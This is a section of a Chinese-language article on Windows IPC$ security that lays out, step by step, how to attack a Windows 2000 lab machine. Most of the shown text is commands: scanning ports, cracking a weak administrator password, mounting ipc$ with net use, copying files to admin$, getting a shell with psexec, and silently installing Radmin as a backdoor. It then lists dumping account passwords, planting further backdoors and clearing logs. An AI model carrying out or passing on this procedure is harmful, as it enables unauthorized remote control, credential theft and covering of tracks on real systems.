网络通信 频道

实战:IPC远程网络连接安全防范分析

二:常见IPC漏洞攻击方法

1.利用IPC漏洞应具备的条件
(1)知道帐号和口令,且帐号的权限必须为系统最高权限,本系统中使用是Administator权限。在绝大多数环境中,利用软件所扫描出来的弱口令一般都是管理员(Administrator)权限(图1)。

图1 密码探测

(2)系统没有禁用远程IPC$连接
(3)能够扫描到对方计算机上所开放的445、135或者139端口

2.攻击步骤
(1)试验环境
> Windows 2000 Professional+SP4虚拟机
> 系统未安装杀毒软件和防火墙
> 目标机IP地址为192.168.1.4
> 远程控制文件R_server.exe、raddrv.dll、AdmDll.dll。
(2)探测目标机开放端口
> 使用sfind工具。使用命令格式为sfind –p 192.168.1.4
> 使用NT自动攻击工具
(3)获取目标机管理员帐号和密码
   通过NT自动攻击工具获取192.168.1.4计算机的管理员帐号是Administrator,密码是123456。
(4)执行命令
> net use \\192.168.1.4\ipc$ "123456" /user:"Administrator"
> copy *.* \\192.168.1.4\admin$ 其中*.*包含所有的控制文件。
> psexec \\192.168.1.4 cmd
> 通过命令行方式安装R_Server。直接在psexec中执行以下命令:
netstat -an |find "4899"
regsrc.exe /pass:lovemeloveyou /port:4899 /save  /silence
regsrc.exe /install /silence
net start r_server
netstat -an |find "4899"
执行结果表示Radmin远程控制软件服务端安装成功,然后通过Radmin客户端可以直接对该计算机实施远程控制。
(5)后续工作
> 获取系统的帐号密码,使用Adump.exe,Passwddump.exe,mt.exe等软件获取系统存在帐号的口令。
> 修改安装服务名称
> 安装其它后门程序
> 清理日志
  说明:现在有很多软件可以自动实现IPC$漏洞的利用,例如NT/Win2000自动攻击工具,流光2000等,一旦找到弱口令,则自动安装指定的后门程序实施控制。

0
相关文章